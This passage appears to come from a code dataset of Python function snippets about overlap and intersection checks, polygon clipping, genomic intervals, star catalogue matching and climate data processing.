shift indices 1 rightward\n idx += 1\n\n # If the start is True prepend a 0\n if condition[0]: idx = np.r_[0, idx]\n\n # If the end is True, append the length of the array\n if condition[-1]: idx = np.r_[idx, condition.size]\n\n # Reshape the result into two columns\n idx.shape = (-1, 2)\n\n # Find lengths of each contiguous segment\n sizes = np.diff(idx, axis=1)\n # Find the location of maximum segment length\n maxPos = np.argmax(sizes)\n # Make indices spanning longest segment\n inds = np.arange(*idx[maxPos])\n\n return inds", "def get_overlaps(file_name):\r\n\r\n place = {}\r\n size = {}\r\n sap = {}\r\n overlapping = []\r\n active_list = []\r\n max_width = 0\r\n\r\n with open(file_name + \".scl\") as f:\r\n for i, line in enumerate(f):\r\n\r\n line = line.strip()\r\n if line:\r\n if line.split()[0] == \"Sitespacing\":\r\n sitespacing = line.split()[2]\r\n if line.split()[0] == \"SubrowOrigin\":\r\n starting_x = line.split()[2]\r\n ending_x = int(starting_x) + int(sitespacing) * int(line.split()[5])\r\n if ending_x > max_width:\r\n max_width = ending_x\r\n\r\n divider = max_width // 10\r\n\r\n with open(file_name + \".nodes\") as f:\r\n for i, line in enumerate(f):\r\n\r\n line = line.strip()\r\n if line:\r\n if re.match(r'[a-z]{1}[0-9]+', line.split()[0]):\r\n if len(line.split()) == 3:\r\n size[line.split()[0]] = [line.split()[1], line.split()[2]]\r\n\r\n with open(file_name + \".pl\") as f:\r\n for i, line in enumerate(f):\r\n\r\n line = line.strip()\r\n if line:\r\n if re.match(r'[a-z]{1}[0-9]+', line.split()[0]):\r\n if line.split()[0] in 
size:\r\n place[line.split()[0]] = [line.split()[1], line.split()[2]]\r\n sap_num = int(line.split()[1]) // divider\r\n if sap_num not in sap.keys():\r\n sap[sap_num] = []\r\n sap[sap_num].append([line.split()[0], int(line.split()[1]),\r\n int(line.split()[1]) + int(size[line.split()[0]][0]), int(line.split()[2]),\r\n \"start\"])\r\n\r\n sap[sap_num].append([line.split()[0], int(line.split()[1]),\r\n int(line.split()[1]) + int(size[line.split()[0]][0]),\r\n int(line.split()[2]) + int(size[line.split()[0]][1]), \"end\"])\r\n\r\n for lista in sap.values():\r\n lista.sort(key=lambda x: x[3])\r\n lista.sort(key=lambda x: x[4], reverse=True)\r\n for element in lista:\r\n if element[4] == \"start\":\r\n if len(active_list) == 0:\r\n active_list.append(element[0])\r\n else:\r\n for node in active_list:\r\n if int(place[node][0]) < int(place[element[0]][0]) + int(size[element[0]][0]) \\\r\n and int(place[node][0]) + int(size[node][0]) > int(place[element[0]][0]) \\\r\n and int(place[node][1]) < int(place[element[0]][1]) + int(size[element[0]][1]) \\\r\n and int(place[node][1]) + int(size[node][1]) > int(place[element[0]][1]):\r\n overlap = (node, element[0])\r\n overlapping.append(overlap)\r\n active_list.append(element[0])\r\n else:\r\n active_list.remove(element[0])\r\n return overlapping", "def overlap(annotations1, annotations2):\n return [val for val in annotations1 if val in annotations2]", "def __listintersect(self, c1, c2):\n s2 = {}\n for delta in c2:\n s2[delta] = 1\n\n\tc = []\n\tfor delta in c1:\n if s2.has_key(delta):\n\t\tc.append(delta)\n\n\treturn c", "def find_conn_CXCY(atom, atom_list):\n le_list = []\n for element in identify_bonds(atom, atom_list):\n if ((element[0].atom_name == \"CX\") or (element[0].atom_name == \"CY\")):\n if (atom.z - element[0].z > 0):\n le_list.append([element[0], 1])\n else:\n le_list.append([element[0], -1])\n return le_list", "def findOverlapOrNearest(gs, ts, tree, start, end):\n #step 1, find overlaps\n rs = set()\n for i in range(start, end + 1):\n if i in gs:\n rs.add(gs[i])\n if len(rs) > 0:\n rs = list(rs)\n return rs, [0] * len(rs)\n #find the nearest one\n else:\n d, i = tree.query([(start + end) / 2], k=1)\n g = gs[ts[i][0]]\n #d = ts[i][0] - (start+end)/2\n d = int(d)\n return [g], [d]", "def get_exons(chromStart, chromEnd, blockSizes, blockStarts):\n blockSizes = [int(i) for i in blockSizes.split(\",\") if not i == \"\" ]\n blockStarts = [int(i) for i in blockStarts.split(\",\") if not i == \"\" ]\n n = len(blockSizes)\n exons = []\n #print(\"block: \" + str(n))\n #print(blockSizes, blockStarts)\n for i in range(n):\n #print(i)\n blockStart = blockStarts[i]\n blockSize = blockSizes[i]\n exonStart = chromStart + blockStart\n exonEnd = exonStart + blockSize\n exons.append([exonStart, exonEnd])\n return(exons)", "def intersect_or_on(s1, s2, c1, c2):\n den = float( (c2.y - c1.y) * (s2.x - s1.x) - (c2.x - c1.x) * (s2.y - s1.y) )\n if not den:\n return None\n\n us = ((c2.x - c1.x) * (s1.y - c1.y) - (c2.y - c1.y) * (s1.x - c1.x)) / den\n uc = ((s2.x - s1.x) * (s1.y - c1.y) - (s2.y - s1.y) * (s1.x - c1.x)) / den\n\n if (0 <= us <= 1) and (0 <= uc <= 1):\n #subj and clip line intersect eachother somewhere in the middle\n #this includes the possibility of degenerates (edge intersections)\n x = s1.x + us * (s2.x - s1.x)\n y = s1.y + us * (s2.y - s1.y)\n return (x, y), us, uc\n else:\n return None", "def overlap(start1, end1, start2, end2):\n return not (end1 < start2 or end2 < start1)", "def intersect(list1, list2):\n #iterative, not recursive\n 
intersect_list = []\n outer_list = []\n inner_list = []\n len_list1 = len(list1)\n len_list2 = len(list2)\n start_outer = 0\n start_inner = 0\n inner_start = 0\n if len_list1 <= len_list2:\n outer_list = list1\n inner_list = list2\n else:\n outer_list = list2\n inner_list = list1\n end_outer = len(outer_list)\n end_inner = len(inner_list)\n if DEBUG_I:\n print \"end_inner\", end_inner\n print \"end_outer\", end_outer\n \"\"\"\n Method 2\n #Somehow worse efficiency than index(item)\n for item in outer_list:\n for dummy_idx in range(start_inner, end_inner):\n if item == inner_list[dummy_idx]:\n intersect_list.append(item)\n if DEBUG_I:\n print \"updating start_inner:\",dummy_idx\n start_inner = dummy_idx\n \n #Method 1\n #Not terrible efficiency, not amazingly bad\n for item in outer_list:\n if item in inner_list:\n inner_start = inner_list.index(item)\n intersect_list.append(item)\n \n #Method 3 - am best\n for item in outer_list:\n if item in inner_list[start_inner:]:\n intersect_list.append(item)\n start_inner = inner_list.index(item)\n if DEBUG_I:\n print \"updating start_inner:\", start_inner \n\n #Method 4, am try to use generator \n for item in outer_list:\n for dummy_idx in gen_range(start_inner, end_inner):\n if item == inner_list[dummy_idx]:\n intersect_list.append(item)\n if DEBUG_I:\n print \"updating start_inner:\",dummy_idx\n start_inner = dummy_idx\n \n #Method 5 - try to break on find\n for item in outer_list:\n for dummy_idx in range(start_inner, end_inner):\n if item == inner_list[dummy_idx]:\n intersect_list.append(item)\n if DEBUG_I:\n print \"updating start_inner:\",dummy_idx\n start_inner = dummy_idx\n break \n \"\"\"\n #Method 6 - dict\n #outer_dict = {entry: entry for entry in outer_list}\n outer_dict = {}\n for entry in outer_list:\n outer_dict[entry] = entry\n for entry in inner_list:\n if entry in outer_dict:\n intersect_list.append(entry)\n \n return intersect_list", "def find_endpoints(batch_trajectories):\n # empty lists to fill\n site_lats = []\n site_lons = []\n last_lats = []\n last_lons = []\n lats_150 = []\n lons_150 = [] \n last_times = []\n times_150 = []\n last_sst = []\n sst_150 = []\n \n # temporary lists as placeholders\n temp_site_lats = []\n temp_site_lons = []\n temp_lats = []\n temp_lons = []\n temp_lats150 = []\n temp_lons150 = []\n temp_times = []\n temp_times150 = []\n temp_sst = []\n temp_sst150 = []\n\n for speed in range(len(batch_trajectories)):\n # working with one speed at a time means working with one nc file at\n # a time\n \n # reset temporary lists\n temp_site_lats = []\n temp_site_lons = []\n temp_lats = []\n temp_lons = []\n temp_lats150 = []\n temp_lons150 = []\n temp_times = []\n temp_times150 = []\n temp_sst = []\n temp_sst150 = []\n\n # extract variables into lists\n lats = batch_trajectories[speed].variables['lat'][:]\n lons = batch_trajectories[speed].variables['lon'][:]\n lats150 = batch_trajectories[speed].variables['lat150'][:]\n lons150 = batch_trajectories[speed].variables['lon150'][:]\n times = batch_trajectories[speed].variables['time'][:]\n ssts = batch_trajectories[speed].variables['temp'][:]\n ssts_150 = batch_trajectories[speed].variables['temp150'][:]\n\n # if a particle is deleted before time is up, values are masked. 
\n # We'd like to get the last valid number.\n for trajectory in range(len(lats)):\n i = -1 # index for the last value\n while np.ma.is_masked(lats[trajectory][i]) is True:\n i -= 1 # if the value is masked, go to one value sooner\n \n j = i # use j for the 150m values\n while lats150[trajectory][j] > 0:\n # we want the first index where the latitude is recorded.\n # j is actually the last one where it's not recorded, so we\n # extract the information at index j+1\n j -= 1\n\n # once i and j are determined for a trajectory, we can extract the\n # variables and append them to temporary lists.\n temp_site_lats.append(lats[trajectory][0])\n temp_site_lons.append(lons[trajectory][0])\n temp_lats.append(lats[trajectory][i])\n temp_lons.append(lons[trajectory][i])\n temp_lats150.append(lats150[trajectory][j+1])\n temp_lons150.append(lons150[trajectory][j+1])\n temp_times.append(times[trajectory][i])\n temp_sst.append(ssts[trajectory][i])\n temp_sst150.append(ssts_150[trajectory][j+1])\n temp_times150.append(times[trajectory][j+1])\n \n # after the temporary lists are appended by sinking speed, they\n # are appended to the big lists that are returned by the function.\n # this keeps the structure of being separated by sinking speed.\n site_lats.append(temp_site_lats)\n site_lons.append(temp_site_lons)\n last_lats.append(temp_lats)\n last_lons.append(temp_lons)\n lats_150.append(temp_lats150)\n lons_150.append(temp_lons150)\n last_times.append(temp_times)\n times_150.append(temp_times150)\n last_sst.append(temp_sst)\n sst_150.append(temp_sst150)\n \n return site_lats, site_lons, last_lats, last_lons, lats_150, lons_150,\\\n last_times, times_150, last_sst, sst_150", "def overlap(t1start, t1end, t2start, t2end):\n\n return (t1start <= t2start <= t1end) or (t2start <= t1start <= t2end)", "def get_staining_overlap(chrom, guide_cutsites, cytogenic_bands):\n\n guide_stains_overlap = []\n if str(chrom) in cytogenic_bands:\n for location in cytogenic_bands[chrom]:\n if guide_cutsites[0] >= location[0] and guide_cutsites[0] < location[1]:\n guide_stains_overlap.append(location[2])\n elif guide_cutsites[-1] >= location[0] and guide_cutsites[-1] < location[1]:\n guide_stains_overlap.append(location[2])\n else:\n print(chrom + \" not found in cytogenic bands file\")\n print(cytogenic_bands.keys())\n\n if guide_stains_overlap:\n return \",\".join(guide_stains_overlap)\n else:\n return ''", "def find_intersections(wire_data):\n # Build a set of course points for each wire\n tracks = [build_track(wire) for wire in wire_data]\n\n # Find the intersection of the two lists\n intersections = list(set(tracks[0]) & set(tracks[1]))\n return intersections", "def clip(self, clip, s_entry, c_entry):\n\n # detect clip mode\n unionmode = not s_entry and not c_entry\n intersectionmode = s_entry and c_entry\n differencemode = not s_entry and c_entry\n\n # prep by removing repeat of startpoint at end\n first = self.first\n last = first.prev\n if last.x == first.x and last.y == first.y:\n first.prev = last.prev\n last.prev.next = first\n first = clip.first\n last = first.prev\n if last.x == first.x and last.y == first.y:\n first.prev = last.prev\n last.prev.next = first\n\n # TODO: maybe also remove repeat points anywhere?\n # ...\n \n # phase one - find intersections\n # ------------------------------\n anyintersection = False\n s_intsecs = []\n c_intsecs = []\n for s in self.iter(): # for each vertex Si of subject polygon do\n for c in clip.iter(): # for each vertex Cj of clip polygon do\n try:\n #print \"find isect %s - %s 
and %s - %s\" %(s.xy, self.next(s.next).xy, c.xy, clip.next(c.next).xy )\n i, alphaS, alphaC = intersect_or_on(s, self.next(s.__next__),\n c, clip.next(c.__next__))\n \n iS = Vertex(i, alphaS, intersect=True, entry=False)\n iC = Vertex(i, alphaC, intersect=True, entry=False)\n\n iS.neighbour = iC\n iC.neighbour = iS\n \n s_intsecs.append( (iS, alphaS, s, self.next(s.__next__)) )\n c_intsecs.append( (iC, alphaC, c, clip.next(c.__next__)) )\n \n anyintersection = True\n \n except TypeError:\n pass # this simply means intersect() returned None\n\n # insert intersections into originals\n for iS,a,s,s_next in reversed(s_intsecs):\n if a == 0:\n self.replace(s, iS)\n elif a == 1:\n self.replace(s_next, iS)\n else:\n self.insert(iS, s, s_next)\n for iC,a,c,c_next in reversed(c_intsecs):\n if a == 0:\n self.replace(c, iC)\n elif a == 1:\n self.replace(c_next, iC)\n else:\n clip.insert(iC, c, c_next)\n\n #print \"testing if insert was done correctly\"\n for s in self.iter():\n #print s\n pass\n #print \"and\"\n for c in clip.iter():\n #print c\n pass\n \n\n # phase one and a half - no intersections between subject and clip, so correctly return results\n # --------------------\n def specialcase_insidetest():\n resultpolys = []\n if unionmode: # union\n if clip.first.isInside(self):\n # clip polygon is entirely inside subject, so just return subject shell\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n elif self.first.isInside(clip):\n # subject polygon is entirely inside clip, so just return clip shell\n clipped = Polygon()\n for c in clip.iter():\n clipped.add(Vertex(c))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n else:\n #clip polygon is entirely outside subject, so return both\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n clipped = Polygon()\n for c in clip.iter():\n clipped.add(Vertex(c))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n elif intersectionmode: # intersection\n if clip.first.isInside(self):\n # clip polygon is entirely inside subject, so the intersection is only the clip polygon\n clipped = Polygon()\n for c in clip.iter():\n clipped.add(Vertex(c))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n elif self.first.isInside(clip):\n # subject polygon is entirely inside clip, so the intersection is only the subject polygon\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n else:\n #clip polygon is entirely outside subject, so no intersection to return\n pass\n elif differencemode: # difference\n if clip.first.isInside(self):\n # clip polygon is entirely inside subject, so the difference is subject with clip as a hole\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n hole = Polygon()\n for c in clip.iter():\n hole.add(Vertex(c))\n polytuple = (clipped, [hole])\n resultpolys.append(polytuple)\n elif self.first.isInside(clip):\n # subject polygon is entirely inside clip, so there is no difference\n pass\n else:\n #clip polygon is entirely outside subject, so difference is simply the subject\n clipped = Polygon()\n for s in self.iter():\n clipped.add(Vertex(s))\n polytuple = (clipped, [])\n resultpolys.append(polytuple)\n # no need to continue so just return result\n return resultpolys\n \n if not anyintersection: \n return specialcase_insidetest()\n\n\n\n\n\n\n\n # phase 
two - identify entry/exit points\n # --------------------------------------\n\n # From K&K\n \n def mark_flags(poly, c, c_entry):\n \"c and c_entry are not actually the clip, can be for both s and c, just too lazy to change.\"\n #print \"intersection\"\n #print \"\\t\",c\n # intersection is degenerate, is the start/endpoint of a line\n # so maybe delete intersection flag based on prev/next locations\n prevloc = testLocation(c.prev, poly)\n nextloc = testLocation(c.__next__, poly)\n if prevloc == \"on\" or nextloc == \"on\":\n prevmid = Vertex(((c.x+c.prev.x)/2.0,(c.y+c.prev.y)/2.0))\n prevloc = testLocation(prevmid, poly)\n nextmid = Vertex(((c.x+c.next.x)/2.0,(c.y+c.next.y)/2.0))\n nextloc = testLocation(nextmid, poly)\n if prevloc == \"in\" or nextloc == \"in\":\n poly.anyinside = True\n #print \"\\t %s -> degenintsec -> %s\" %(prevloc,nextloc)\n if prevloc == \"out\":\n if nextloc == \"out\":\n #just touching\n c.entry = \"en/ex\" if c_entry else \"ex/en\"\n elif nextloc == \"in\":\n c.entry = \"en\" if c_entry else \"ex\"\n elif nextloc == \"on\":\n c.entry = \"en\" if c_entry else \"ex\"\n elif prevloc == \"in\":\n #union and difference should never go inside the other polygon\n #so this should only happen for intersectmode...\n if nextloc == \"in\":\n #just touching\n c.entry = \"ex/en\" if c_entry else \"en/ex\"\n elif nextloc == \"out\":\n c.entry = \"ex\" if c_entry else \"en\"\n elif nextloc == \"on\":\n c.entry = \"ex\" if c_entry else \"en\"\n elif prevloc == \"on\":\n if nextloc == \"on\":\n c.entry = None\n elif nextloc == \"out\":\n c.entry = \"ex\" if c_entry else \"en\"\n elif nextloc == \"in\":\n c.entry = \"en\" if c_entry else \"ex\"\n\n self.anyinside = False\n\n # set clip\n prevsingle = None\n for c in clip.iter():\n if c.intersect:\n mark_flags(self, c, c_entry)\n # set couple\n if c.entry in (\"ex\",\"en\"):\n if prevsingle and c.entry == prevsingle.entry:\n c.couple = prevsingle\n prevsingle.couple = c\n prevsingle = c\n # set crosschange\n # some modifications based on implementation in qt clipper source code\n #if c.entry == \"en/ex\" == c.neighbour.entry or c.entry == \"ex/en\" == c.neighbour.entry:\n if False: #c.entry == \"en/ex\" or c.entry == \"ex/en\":\n print(\"Maybe crosschange...\")\n # tri1\n #a,b,c = c.neighbour.prev, c.prev, c.neighbour.next\n a,b,c = c.neighbour.__next__, c.prev, c.neighbour.prev\n dir1 = 0.5 * (a.x * (b.y-c.y) +\n b.x * (c.y-a.y) +\n c.x * (a.y-b.y))\n # tri2\n #a,b,c = c.neighbour.prev, c.prev, c.next\n a,b,c = c.__next__, c.prev, c.neighbour.prev\n dir2 = 0.5 * (a.x * (b.y-c.y) +\n b.x * (c.y-a.y) +\n c.x * (a.y-b.y))\n print(dir1,dir2)\n #if dir1 < 0 != dir2 < 0: # different orientation\n if (dir1 * dir2) < 0: # different orientation means at least one negative, making the results less than 0\n print(\"CROSSCHANGE!!!\")\n c.cross_change = True\n c.neighbour.cross_change = True # not sure if should set neighbour too\n\n # maybe early abort\n if not self.anyinside and intersectionmode:\n return []\n\n # what about perfect overlap???\n # ...\n\n if False: #DEBUG:\n print(\"view clip entries\")\n for c in clip.iter():\n print(c, c.entry)\n\n # find first isect where both neighbours have valid flag\n for c in clip.iter():\n if c.entry:\n s = c.neighbour\n mark_flags(clip, s, s_entry)\n if s.entry:\n first_c = c\n first_s = s\n # print 777,s.entry\n break\n\n else:\n return specialcase_insidetest()\n #raise Exception(\"weird special case, no neighbours that both have flag left\")\n \n # autoset subj, if neighbour of first is 
different, then set all as opposite\n # TODO: how deal with s_entry in case of different modes...?\n print(\"view first\")\n print(first_c, first_c.entry)\n print(first_s, first_s.entry)\n if first_c.entry != first_s.entry: # and s_entry: # this is the behaviour for standard intersect mode, otherwise flip, hence the s_entry\n for c in clip.iter():\n if c.entry:\n if c.entry == \"en\": c.neighbour.entry = \"ex\"\n elif c.entry == \"ex\": c.neighbour.entry = \"en\"\n elif c.entry == \"en/ex\": c.neighbour.entry = \"ex/en\"\n elif c.entry == \"ex/en\": c.neighbour.entry = \"en/ex\"\n \n # else set all same\n else:\n for c in clip.iter():\n if c.entry:\n c.neighbour.entry = c.entry\n\n # set couple for subj (not sure if needed)\n prevsingle = None\n for s in self.iter():\n if s.entry:\n if s.entry in (\"ex\",\"en\"):\n if prevsingle and s.entry == prevsingle.entry:\n s.couple = prevsingle\n prevsingle.couple = s\n prevsingle = s\n\n if False: #DEBUG: \n print(\"view subj entries\")\n for s in self.iter():\n print(s, s.entry)\n\n\n\n\n\n # phase three - construct a list of clipped polygons\n # --------------------------------------------------\n\n ######\n # Defs\n def next_unprocessed(vert):\n origvert = vert\n while vert:\n if vert.entry and not (vert.checked or vert.neighbour.checked):\n #print \"vert, found next unproc\", vert, vert.checked, vert.neighbour.checked\n if vert.couple:\n # rule 1\n if vert.couple.entry and vert.entry:\n # rule 2\n if vert.couple.entry == \"en\" and vert.entry == \"en\":\n return vert.couple\n elif vert.couple.entry == \"ex\" and vert.entry == \"ex\":\n return vert\n # rule 3\n else:\n return vert\n \n vert = vert.__next__\n \n if vert == origvert:\n # if returned to first, return None\n return None\n\n def DeleteFlag1(cur, stat):\n if cur.entry == \"en/ex\":\n cur.entry = None\n if cur.cross_change:\n if stat == \"D3\":\n return \"D3\"\n else:\n return \"D4\"\n if stat == \"D3\":\n return \"D4\"\n else:\n return \"D3\"\n if cur.entry == \"ex/en\":\n if stat == \"D3\":\n cur.entry = \"en\"\n return \"D2\"\n else:\n cur.entry = \"ex\"\n return \"D1\"\n if cur.entry == \"en\":\n cur.entry = None\n return \"D1\"\n if cur.entry == \"ex\":\n cur.entry = None\n return \"D2\"\n\n def DeleteFlag2(cur, prev, stat):\n if cur.entry == \"en/ex\":\n if stat == \"D1\":\n cur.entry = \"ex\"\n else:\n cur.entry = \"en\"\n if cur.cross_change:\n if stat == \"D1\":\n return \"D4\"\n else:\n return \"D3\"\n if stat == \"D1\":\n return \"D3\"\n else:\n return \"D4\"\n if cur.entry == \"ex/en\":\n if stat == \"D1\":\n cur.entry = \"en\"\n else:\n cur.entry = \"ex\"\n if cur.cross_change:\n if stat == \"D1\":\n return \"D4\"\n else:\n return \"D3\"\n if stat == \"D1\":\n return \"D3\"\n else:\n return \"D4\"\n if cur.entry == \"en\":\n cur.entry = None\n if stat == \"D1\" and cur.couple and prev.couple == cur:\n return \"D1\"\n if stat == \"D1\":\n return \"D3\"\n else:\n return \"D4\"\n if cur.entry == \"ex\":\n cur.entry = None\n if stat != \"D1\" and cur.couple and prev.couple == cur:\n return \"D2\"\n else:\n if stat == \"D1\":\n return \"D3\"\n else:\n return \"D4\"\n\n def proceed(cur, stat):\n cur.checked = True\n if stat == \"D1\":\n clipped.add(Vertex(cur))\n return cur.__next__\n elif stat == \"D2\":\n clipped.add(Vertex(cur))\n return cur.prev\n else:\n return cur.neighbour\n\n ####\n resultpolys = []\n\n self.first.checked = True\n cur = prev = start = next_unprocessed(self.first)\n\n while cur:\n # each new polygon\n print(\"new poly\")\n\n stat = DeleteFlag1(cur, 
\"D3\")\n if DEBUG: print(\"v\", cur, cur.entry, stat)\n clipped = Polygon()\n cur = proceed(cur, stat)\n\n # collect vertexes\n while cur != start:\n if DEBUG: print(\"v\", cur, cur.entry, stat)\n if cur.entry:\n if stat == \"D1\" or stat == \"D2\":\n stat = DeleteFlag2(cur, prev, stat)\n else:\n stat = DeleteFlag1(cur, stat)\n prev = cur\n cur = proceed(cur, stat)\n\n # return to first vertex\n clipped.add(Vertex(clipped.first))\n\n print(clipped)\n\n resultpolys.append((clipped,[]))\n cur = prev = start = next_unprocessed(self.first)\n\n\n\n # finally, sort into exteriors and holes\n for pindex,(polyext,polyholes) in enumerate(resultpolys):\n for otherext,otherholes in resultpolys:\n if polyext == otherext:\n continue # don't compare to self\n if polyext.first.isInside(otherext):\n otherholes.append(polyext) #poly is within other so make into a hole\n del resultpolys[pindex] #and delete poly from being an independent poly\n return resultpolys", "def _check_common_start(self, valid_list):\n start_list = list(\n set([item.coords[\"time\"].values[0] for item in valid_list])\n )\n if len(start_list) != 1:\n return False\n return True", "def overlap_ss(Ax, Ay, Az, Cx, Cy, Cz, alpha_bra, alpha_ket, c1, c2):\n A = np.array([Ax, Ay, Az])\n C = np.array([Cx, Cy, Cz])\n alpha_sum = alpha_bra + alpha_ket\n return c1 * c2 * (np.pi / alpha_sum)**(3/2) * np.exp((-alpha_bra * alpha_ket * np.dot(A-C, A-C)) / alpha_sum)", "def remove_citation_overlaps(text, possible_markers):\n return [(m, start, end) for m, start, end in possible_markers\n if not any((e.start <= start and e.end >= start)\n or (e.start <= end and e.end >= end)\n or (start <= e.start and end >= e.end)\n for e in internal_citations(text))]", "def compute_start_end_points(linestrings):\n starts = []\n stops = []\n for ls in linestrings:\n pt = Point(ls.coords[0])\n starts.append(round(CONUS[\"poly\"].exterior.project(pt), 2))\n pt = Point(ls.coords[-1])\n stops.append(round(CONUS[\"poly\"].exterior.project(pt), 2))\n return starts, stops", "def match_coords_v2(list1, list2, tol = 1.5):\n tol1, tol2 = tol/3600.0, (tol/3600.0)**2\n jmin, match_idx, best_dr2 = 0, [None]*len(list1), [tol2]*len(list1)\n # Unpack the RAs and DECs of everything into numpy arrays.\n list1ra = np.array([c.ra for c in list1])\n list2ra = np.array([c.ra for c in list2])\n list1dec = np.array([c.dec for c in list1])\n list2dec = np.array([c.dec for c in list2])\n # This next bit is rather tricky because we have to sort the lists,\n # but also remember where we put each item. 
Here i, j = sorted indices,\n # while ci[i], ci[j] = corresponding actual indices in original lists.\n # Introduce transformed lists to economize on indexing.\n ci, cj = list1ra.argsort(), list2ra.argsort()\n slist1ra, slist1dec = list1ra[ci], list1dec[ci]\n slist2ra, slist2dec = list2ra[cj], list2dec[cj]\n # Since there's no sense in searching outside the bounds of the arrays,\n # extract the indices of only those elements within the rectangular\n # overlap area (we'll mostly be dealing with equatorial rectangles).\n # Reindex the lists to the originals.\n R0, R1 = max(min(list1ra), min(list2ra)), min(max(list1ra), max(list2ra))\n D0, D1 = max(min(list1dec), min(list2dec)), min(max(list1dec), max(list2dec))\n ci = ci[np.all([slist1ra >= R0, slist1dec >= D0,\n slist1ra <= R1, slist1dec <= D1], axis=0)]\n cj = cj[np.all([slist2ra >= R0, slist2dec >= D0,\n slist2ra <= R1, slist2dec <= D1], axis=0)]\n slist1ra, slist1dec = list1ra[ci], list1dec[ci]\n slist2ra, slist2dec = list2ra[cj], list2dec[cj]\n # Finally, start going through the lists again.\n for i in range(len(slist1ra)):\n decmin, decmax = slist1dec[i] - tol1, slist1dec[i] + tol1\n CD = np.cos(0.5*(decmin+decmax)*np.pi/180.0)\n ramin, ramax = slist1ra[i] - tol1/CD, slist1ra[i] + tol1/CD\n # Inch along in list2 until we find the part that matches list1 in RA\n while jmin < len(slist2ra) and slist2ra[jmin] < ramin: jmin += 1\n # No point going past the end of the list\n if jmin == len(slist2ra): break\n # Now go through all the RA matches and check the RA+DEC distance.\n j = jmin\n while j < len(slist2ra) and slist2ra[j] < ramax:\n # Check in the box before finding the angular distance\n if slist2dec[j] > decmin and slist2dec[j] < decmax:\n dr2 = ((CD*(slist1ra[i]-slist2ra[j]))**2 +\n (slist1dec[i]-slist2dec[j])**2)\n if dr2 < best_dr2[ci[i]]:\n match_idx[ci[i]], best_dr2[ci[i]] = cj[j], dr2\n j += 1\n # Save and return the index in list2 of the best-matched object to each\n # item in list1, and the distances between corresponding best matches.\n best_dr = [np.sqrt(dr2)*3600 for dr2 in best_dr2]\n return match_idx, best_dr", "def overlaps(vals, perc=.5):\n underlaps = []\n if len(vals) > 0:\n underlaps.append(vals[0])\n for val in vals:\n i = 0\n amount = len(underlaps)\n inv = 1\n while (inv):\n\n if (i == amount):\n underlaps.append(val)\n inv = False\n elif poverlap(underlaps[i][1], val[1],\n underlaps[i][2], val[2]) >= perc:\n if val[0] > underlaps[i][0]:\n underlaps[i] = val\n inv = False\n else:\n i += 1\n \n return underlaps", "def populate_agdds(start_date, end_date, source, source_id, stations):\r\n # possibly grab ACIS station data (for entire date range)\r\n if source == 'ACIS':\r\n station_ids = []\r\n for station in stations:\r\n station_ids.append(station['char_network_id'])\r\n acis_data = get_acis_climate_data(\",\".join(station_ids), 'mint,maxt,gdd32,gdd50', start_date, end_date)\r\n\r\n for station in stations:\r\n print(station['char_network_id'])\r\n # grab previous days tmin, tmax, and agdd for both bases from mysql agdds table and start over at year breaks\r\n day_before_start_date = start_date - timedelta(days=1)\r\n if day_before_start_date.year == start_date.year:\r\n prev_tmin = get_element_from_qc_table(station['station_id'], source_id, day_before_start_date, 32, 'tmin')\r\n prev_tmax = get_element_from_qc_table(station['station_id'], source_id, day_before_start_date, 32, 'tmax')\r\n agdd32 = get_element_from_qc_table(station['station_id'], source_id, day_before_start_date, 32, 'agdd')\r\n agdd50 = 
get_element_from_qc_table(station['station_id'], source_id, day_before_start_date, 50, 'agdd')\r\n else:\r\n prev_tmin = None\r\n prev_tmax = None\r\n agdd32 = None\r\n agdd50 = None\r\n\r\n if prev_tmin is None or prev_tmin == 'M':\r\n prev_tmin = 0\r\n if prev_tmax is None or prev_tmax == 'M':\r\n prev_tmax = 0\r\n if agdd32 is None or agdd32 == 'M':\r\n agdd32 = 0\r\n if agdd50 is None or agdd50 == 'M':\r\n agdd50 = 0\r\n\r\n # possibly find station of interest from ACIS retrieved data\r\n acis_station = None\r\n if source == 'ACIS':\r\n station_found = False\r\n for a_station in acis_data['data']:\r\n if station_found:\r\n break\r\n for sid in a_station['meta']['sids']:\r\n # print(sid)\r\n # print(station['char_network_id'])\r\n if station['char_network_id'] in sid:\r\n station_found = True\r\n acis_station = a_station\r\n break\r\n if not station_found:\r\n print(\"Could not find station \" + station['char_network_id'])\r\n\r\n previous_year = start_date.year\r\n delta = end_date - start_date\r\n for i in range(delta.days + 1):\r\n day = start_date + timedelta(days=i)\r\n doy = day.timetuple().tm_yday\r\n\r\n # reset the agdd to 0 if we go into a new year\r\n if previous_year != day.year:\r\n agdd32 = 0\r\n agdd50 = 0\r\n previous_year = day.year\r\n\r\n missing_data = False\r\n print(day.strftime(\"%Y-%m-%d\"))\r\n\r\n # see if we already have tmin and tmax from local db\r\n # tmin = None\r\n # tmax = None\r\n tmin = get_element_from_qc_table(station['station_id'], source_id, day, 32, 'tmin')\r\n tmax = get_element_from_qc_table(station['station_id'], source_id, day, 32, 'tmax')\r\n\r\n already_retrieved = False\r\n if tmin is not None and tmin != 'M' and tmax is not None and tmax != 'M' and source != 'PRISM':\r\n already_retrieved = True\r\n\r\n # don't already have tmin and tmax locally so grab from URMA postgis db or ACIS data\r\n if not already_retrieved:\r\n if source == 'URMA':\r\n if station['char_value'] == 'AK':\r\n tmin = get_urma_climate_data(station['longitude'], station['latitude'], day, 'tmin', 'alaska')\r\n tmax = get_urma_climate_data(station['longitude'], station['latitude'], day, 'tmax', 'alaska')\r\n else:\r\n tmin = get_urma_climate_data(station['longitude'], station['latitude'], day, 'tmin', 'conus')\r\n tmax = get_urma_climate_data(station['longitude'], station['latitude'], day, 'tmax', 'conus')\r\n # URMA and PRISM are in celsius in our postgis db everything else is Fer so convert here\r\n if tmin is not None:\r\n tmin = tmin * 1.8 + 32\r\n if tmax is not None:\r\n tmax = tmax * 1.8 + 32\r\n elif source == 'PRISM':\r\n tmin = get_prism_climate_data(station['longitude'], station['latitude'], day, 'tmin')\r\n tmax = get_prism_climate_data(station['longitude'], station['latitude'], day, 